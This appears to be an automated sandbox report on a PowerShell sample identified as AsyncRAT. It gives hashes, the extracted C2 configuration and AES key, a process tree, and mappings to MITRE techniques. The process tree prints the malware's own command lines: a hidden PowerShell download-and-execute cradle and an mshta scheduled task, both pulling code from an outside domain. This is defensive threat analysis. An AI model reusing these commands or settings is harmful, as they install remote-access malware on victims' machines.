Analysis

  • max time kernel
    149s
  • max time network
    148s
  • platform
    windows7_x64
  • resource
    win7v20201028
  • submitted
    13-01-2021 16:33

General

  • Target

    bd8ae1109db967293859c064576cd3446034d03088b85781c0b7b46ef0ba29d5.ps1

  • Size

    149KB

  • MD5

    67751a297e6183d8677b34fa47457883

  • SHA1

    def2c607dfb218cb12159871631052556d972286

  • SHA256

    bd8ae1109db967293859c064576cd3446034d03088b85781c0b7b46ef0ba29d5

  • SHA512

    62013becbacd92cf399beb11761bb9a24c0b34634068a7201bfd18b0375bb0ed15d81a6d1d2a340eac26d5a73c3a8cc67a3a535759c7ee68be1f60b179c4f2e9

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://azulviagens.online/certificate/quasar.mp3

Extracted

Family

asyncrat

Version

0.5.7B

C2

127.0.0.1:6606

127.0.0.1:7707

127.0.0.1:8808

minharola.hopto.org:6606

minharola.hopto.org:7707

minharola.hopto.org:8808

cdtpitbull.hopto.org:6606

cdtpitbull.hopto.org:7707

cdtpitbull.hopto.org:8808

cudaegua.ddns.net:6606

cudaegua.ddns.net:7707

cudaegua.ddns.net:8808

Mutex

a377d1b1c0538833035211f4083d00fecc414dab

Attributes
  • aes_key

    uHP7c7Cosh571ds05um4kYDDE2FWQ6fx

  • anti_detection

    false

  • autorun

    false

  • bdos

    false

  • delay

    NEW-SPAM

  • host

    127.0.0.1,minharola.hopto.org,cdtpitbull.hopto.org,cudaegua.ddns.net

  • hwid

    3

  • install_file

  • install_folder

    %AppData%

  • mutex

    a377d1b1c0538833035211f4083d00fecc414dab

  • pastebin_config

    null

  • port

    6606,7707,8808

  • version

    0.5.7B

aes.plain

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers.

  • Async RAT payload 5 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 10 IoCs
  • Suspicious use of AdjustPrivilegeToken 6 IoCs
  • Suspicious use of WriteProcessMemory 58 IoCs

Processes

  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\bd8ae1109db967293859c064576cd3446034d03088b85781c0b7b46ef0ba29d5.ps1
    1⤵
    • Suspicious use of SetThreadContext
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1096
    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe"
      2⤵
        PID:316
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe"
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1624
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\System32\cmd.exe" /c start /b powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\aoomxc.vbs"' & exit
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:552
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\aoomxc.vbs"'
            4⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:1588
            • C:\Windows\SysWOW64\WScript.exe
              "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\aoomxc.vbs"
              5⤵
              • Suspicious use of WriteProcessMemory
              PID:1996
              • C:\Windows\SysWOW64\cmd.exe
                cmd /c start /min powershell -WindowStyle Hidden -exec bypass -Noninteractive i'E'x ((New-Object System.Net.WebClient).DownloadString('http://azulviagens.online/certificate/quasar.mp3'))
                6⤵
                • Suspicious use of WriteProcessMemory
                PID:2028
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  powershell -WindowStyle Hidden -exec bypass -Noninteractive i'E'x ((New-Object System.Net.WebClient).DownloadString('http://azulviagens.online/certificate/quasar.mp3'))
                  7⤵
                  • Blocklisted process makes network request
                  • Suspicious use of SetThreadContext
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  • Suspicious use of WriteProcessMemory
                  PID:888
                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"
                    8⤵
                    • Suspicious use of AdjustPrivilegeToken
                    PID:1636
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\System32\cmd.exe" /c start /b powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\qawwzu.bat"' & exit
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:1248
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\qawwzu.bat"'
            4⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:736
            • C:\Windows\SysWOW64\cmd.exe
              cmd /c ""C:\Users\Admin\AppData\Local\Temp\qawwzu.bat" "
              5⤵
              • Suspicious use of WriteProcessMemory
              PID:1236
              • C:\Windows\SysWOW64\schtasks.exe
                schtasks /create /sc MINUTE /mo 60 /tn ""GRINGO"" /tr ""\""mshta\""http://azulviagens.online/TAREFAGRINGA.MP3"" /F
                6⤵
                • Creates scheduled task(s)
                PID:1640

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Execution

    Scheduled Task

    1
    T1053

    Persistence

    Scheduled Task

    1
    T1053

    Privilege Escalation

    Scheduled Task

    1
    T1053

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_3bf4f350-86fe-486e-8b87-41ab96d0ad9c
      MD5

      b6d38f250ccc9003dd70efd3b778117f

      SHA1

      d5a17c02cac698d4f0a4a9b7d71db2aa19e3f18a

      SHA256

      4de9d7b5ccab7b67ca8efc83084c7ee6e5e872b7216ed4683bc5da950bf41265

      SHA512

      67d8195836b7f280d3f9219fd0f58276342e55d5dfdd8a4c54355030d96685d73f1b2b6da0eb39322ec7c3a1d1c5ef06b52d22646cea30a96f822de1800d31e9

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_4408bb97-19ee-4815-b02c-5a0939dddad8
      MD5

      df44874327d79bd75e4264cb8dc01811

      SHA1

      1396b06debed65ea93c24998d244edebd3c0209d

      SHA256

      55de642c5c9e436ec01c57004dae797022442c3245daf7162d19a5585f221181

      SHA512

      95dc9298b8db059bbe746f67e6a7f8515781c7053cc60c01532e47623a996be7e1bd23d1bd8f5f2045adff27454f44930d503c15b695690088841cedbd2a06c3

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_644b5728-e9b5-45ab-9104-7136ec814422
      MD5

      be4d72095faf84233ac17b94744f7084

      SHA1

      cc78ce5b9c57573bd214a8f423ee622b00ebb1ec

      SHA256

      b0d72c5c22e57913476ac8fc686a4593f137c6667d5094522c0a0685dabd7adc

      SHA512

      43856e9b1032b8690ceea810c931bed3655e9190414bb220fb6afc136f31b8335e07604dffb28405d4006f266a54cff424c527d29924b1b732c9647a3252b097

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_6532a425-51ae-4577-837f-c6e09d9fcfcf
      MD5

      75a8da7754349b38d64c87c938545b1b

      SHA1

      5c28c257d51f1c1587e29164cc03ea880c21b417

      SHA256

      bf08151c174b5d00c9dbc7907b2c6a01b4be76bfa3afce1e8bd98a04ad833c96

      SHA512

      798797bc74c56c874e9a5fdcb0157c04e37a1b3cce285ef064b01bceef8cec45f11a5198918c6c647220b62883606b5e12e3cca3ea369f3a66e69dea6e15f643

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_69670b6c-d49a-42a9-993a-10d18807f7c6
      MD5

      5e3c7184a75d42dda1a83606a45001d8

      SHA1

      94ca15637721d88f30eb4b6220b805c5be0360ed

      SHA256

      8278033a65d1ff48be4d86e11f87930d187692f59f8bf2f0a9d170de285afb59

      SHA512

      fae99b6e9b106e0f1c30aa4082b25ae1ad643455c1295c2c16ad534e3e611b9b08492353ffe1af1cfdddc9b2b7c330747a64012c45e62b8f4a4982dcc214e05b

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_e9f9468a-8cbd-4472-b808-e8b3772f4134
      MD5

      02ff38ac870de39782aeee04d7b48231

      SHA1

      0390d39fa216c9b0ecdb38238304e518fb2b5095

      SHA256

      fbd66a9baf753db31b8de23f2d51b67f8676687503653103080c45b16f1dc876

      SHA512

      24a1ff76ee42ff7a5ea42843928c4df07b06178f7781cd840e1e086e88735d81506eb67259ff1e6ce5aaa7c5baea03886da265eb7e025ff4dc4c4b5f8cd3e341

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
      MD5

      a02a1449a5084e0ff94163a936c07383

      SHA1

      dec336e99c3b844e61331702f9bdaaefc49f1ca7

      SHA256

      3f7cc1d27c36504b2318a446b1d61c7abb149a9ef23d347232f1fea1363630e9

      SHA512

      e3dfe4fd9822d0f6f48c292c35513821a2f3e871012858fccba5562558b7232460d51d8d9a44146f144f9dc3794f45485ecb4fbe529f9afea2527af251806c25

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
      MD5

      55990fdfb7cd45664ddd7331ef0bb926

      SHA1

      16a8dea2f65b6495a552f0ecfb29c8a5bc5e1b91

      SHA256

      dddf73e4f8c61c48c0120170d151f246a8b39f119e3c96dd86b6930340e82488

      SHA512

      b5e53f1a657220d2d844c53e919a8b7b2995426014f384c0e1ceec9c9e172a5fec00d658b86feba20f1794cd558d2d10eacd2b75d0f6585ff2144b0889528190

    • C:\Users\Admin\AppData\Local\Temp\aoomxc.vbs
      MD5

      8d78e7abd3e9c8ffc64abad98fb528f6

      SHA1

      fa88db0bb15b218ab0cb98aa25b43d3407a3bcb8

      SHA256

      132898aeb180a8b7bcc6afddc70977701e6bedff71b7f2defd9fa546f73b7cdd

      SHA512

      e0579dea2dccd9120b017da5857b64f739cb80e93c711895c94a1ddd0864dfa586d88f41a68ffa0f3fe9c95ce693cea5b49ba62d9c468b6a1da7056709921edd

    • C:\Users\Admin\AppData\Local\Temp\qawwzu.bat
      MD5

      f2c5587d60641acb4d9136ab9220e038

      SHA1

      c969dddb519a992856f75f1b240e253e5a41c141

      SHA256

      f220fa0725e22f216404fc51191c07a6841347925807fe384b9b18192854fb82

      SHA512

      4e90110a97a382448b615f59c73a39b309a89fac5bb6a9f42ad87aa3265dd20e32faeb0d3b35a1378c10fdf318deb8252a3c9f2abd38256ff93dfcfbbdc156c2

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
      MD5

      2ea109d8b2083c8ed19b4e7b09c15e6a

      SHA1

      f2a5f665a89fd5dadf46dbd9ea156b3efdf64613

      SHA256

      2ab38044b07f0ab3d3822cce59dcfff99f8a999237d61487ed31d62f390ba9c7

      SHA512

      a2091233a7b8d6e19243300828fd861250ab6b3fe991da78d554252cdf89432207d181bd83195e4e040c3996d5063ade1bebc3eb27360e1ed5b66b05fd922aa1

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
      MD5

      2ea109d8b2083c8ed19b4e7b09c15e6a

      SHA1

      f2a5f665a89fd5dadf46dbd9ea156b3efdf64613

      SHA256

      2ab38044b07f0ab3d3822cce59dcfff99f8a999237d61487ed31d62f390ba9c7

      SHA512

      a2091233a7b8d6e19243300828fd861250ab6b3fe991da78d554252cdf89432207d181bd83195e4e040c3996d5063ade1bebc3eb27360e1ed5b66b05fd922aa1

    • \??\PIPE\srvsvc
      MD5

      d41d8cd98f00b204e9800998ecf8427e

      SHA1

      da39a3ee5e6b4b0d3255bfef95601890afd80709

      SHA256

      e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

      SHA512

      cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

    • memory/552-16-0x0000000000000000-mapping.dmp
    • memory/736-72-0x00000000741F0000-0x00000000748DE000-memory.dmp
      Filesize

      6.9MB

    • memory/736-75-0x00000000046C0000-0x00000000046C1000-memory.dmp
      Filesize

      4KB

    • memory/736-76-0x0000000005300000-0x0000000005301000-memory.dmp
      Filesize

      4KB

    • memory/736-69-0x0000000000000000-mapping.dmp
    • memory/736-78-0x0000000005750000-0x0000000005751000-memory.dmp
      Filesize

      4KB

    • memory/888-43-0x0000000000000000-mapping.dmp
    • memory/888-45-0x00000000741F0000-0x00000000748DE000-memory.dmp
      Filesize

      6.9MB

    • memory/888-57-0x00000000061C0000-0x00000000061C1000-memory.dmp
      Filesize

      4KB

    • memory/888-59-0x0000000006150000-0x0000000006158000-memory.dmp
      Filesize

      32KB

    • memory/888-49-0x0000000005300000-0x0000000005301000-memory.dmp
      Filesize

      4KB

    • memory/888-58-0x0000000006390000-0x0000000006397000-memory.dmp
      Filesize

      28KB

    • memory/888-48-0x0000000005200000-0x0000000005201000-memory.dmp
      Filesize

      4KB

    • memory/888-47-0x0000000004760000-0x0000000004761000-memory.dmp
      Filesize

      4KB

    • memory/888-46-0x0000000001F80000-0x0000000001F81000-memory.dmp
      Filesize

      4KB

    • memory/1096-2-0x000007FEF5A70000-0x000007FEF645C000-memory.dmp
      Filesize

      9.9MB

    • memory/1096-5-0x0000000002420000-0x0000000002421000-memory.dmp
      Filesize

      4KB

    • memory/1096-6-0x0000000002450000-0x0000000002451000-memory.dmp
      Filesize

      4KB

    • memory/1096-7-0x0000000001DC0000-0x0000000001DC3000-memory.dmp
      Filesize

      12KB

    • memory/1096-4-0x000000001AE00000-0x000000001AE01000-memory.dmp
      Filesize

      4KB

    • memory/1096-3-0x00000000022F0000-0x00000000022F1000-memory.dmp
      Filesize

      4KB

    • memory/1236-80-0x0000000000000000-mapping.dmp
    • memory/1248-68-0x0000000000000000-mapping.dmp
    • memory/1588-19-0x0000000000AC0000-0x0000000000AC1000-memory.dmp
      Filesize

      4KB

    • memory/1588-22-0x0000000004750000-0x0000000004751000-memory.dmp
      Filesize

      4KB

    • memory/1588-17-0x0000000000000000-mapping.dmp
    • memory/1588-18-0x00000000741F0000-0x00000000748DE000-memory.dmp
      Filesize

      6.9MB

    • memory/1588-38-0x0000000006250000-0x0000000006251000-memory.dmp
      Filesize

      4KB

    • memory/1588-31-0x00000000057E0000-0x00000000057E1000-memory.dmp
      Filesize

      4KB

    • memory/1588-30-0x00000000056B0000-0x00000000056B1000-memory.dmp
      Filesize

      4KB

    • memory/1588-25-0x0000000005670000-0x0000000005671000-memory.dmp
      Filesize

      4KB

    • memory/1588-20-0x0000000004880000-0x0000000004881000-memory.dmp
      Filesize

      4KB

    • memory/1588-21-0x0000000002500000-0x0000000002501000-memory.dmp
      Filesize

      4KB

    • memory/1624-9-0x000000000040D07E-mapping.dmp
    • memory/1624-8-0x0000000000400000-0x0000000000412000-memory.dmp
      Filesize

      72KB

    • memory/1624-15-0x00000000004D0000-0x00000000004EB000-memory.dmp
      Filesize

      108KB

    • memory/1624-12-0x00000000741F0000-0x00000000748DE000-memory.dmp
      Filesize

      6.9MB

    • memory/1624-11-0x0000000000400000-0x0000000000412000-memory.dmp
      Filesize

      72KB

    • memory/1624-10-0x0000000000400000-0x0000000000412000-memory.dmp
      Filesize

      72KB

    • memory/1636-63-0x0000000000400000-0x0000000000484000-memory.dmp
      Filesize

      528KB

    • memory/1636-64-0x00000000741F0000-0x00000000748DE000-memory.dmp
      Filesize

      6.9MB

    • memory/1636-62-0x0000000000400000-0x0000000000484000-memory.dmp
      Filesize

      528KB

    • memory/1636-61-0x000000000047E7CE-mapping.dmp
    • memory/1636-60-0x0000000000400000-0x0000000000484000-memory.dmp
      Filesize

      528KB

    • memory/1640-81-0x0000000000000000-mapping.dmp
    • memory/1996-42-0x0000000002670000-0x0000000002674000-memory.dmp
      Filesize

      16KB

    • memory/1996-40-0x0000000000000000-mapping.dmp
    • memory/2028-41-0x0000000000000000-mapping.dmp